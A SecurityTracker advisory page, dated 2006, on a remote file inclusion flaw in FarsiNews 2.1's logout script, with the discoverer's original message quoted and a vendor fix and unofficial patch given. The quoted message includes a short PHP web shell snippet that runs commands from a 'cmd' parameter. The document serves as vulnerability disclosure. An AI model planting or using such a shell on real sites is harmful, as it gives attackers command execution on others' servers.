Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Forum/Board/Portal)  >   FarsiNews Vendors:
FarsiNews Include File Bug in 'logout.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015554
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 31 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.1 Beta 2 and prior versions
Description:   Hamid Ebadi reported a vulnerability in FarsiNews. A remote user can execute arbitrary code on the target system.

The 'logout.php' script does not properly validate user-supplied input. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:


The original advisory is available at:

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   The vendor has issued a fixed version (2.5), available at:

Vendor URL: (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  FarsiNews 2.1 PHP Remote File Inclusion

Remote File Inclusion in  FarsiNews 2.1 and below
The information has been provided by Hamid Ebadi
(Hamid Network Security Team)
The original article can be found at :

Vulnerable Systems:
    FarsiNews 2.1 Beta 2 and below

Vulnerable Code: 
The following lines in loginout.php :

If register_globals=ON  has been marked (check
PHP.INI) we can exploit  below URL to cause it to
include external file.

The following URL will cause the server to include
external files  ( phpshell.txt ):

system ($_GET['cmd']);
die ("<h3> >> Hamid Ebadi << (Hamid
Network Security Team)</h3> ");

use FarsiNews 2.5 or for Unofficial Patch , simply add
the following line in  the second line of

if (isset($_REQUEST["cutepath"])){ die("Patched by
Hamid Ebadi -->  ( Hamid Network
Security Team)  "); }


Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC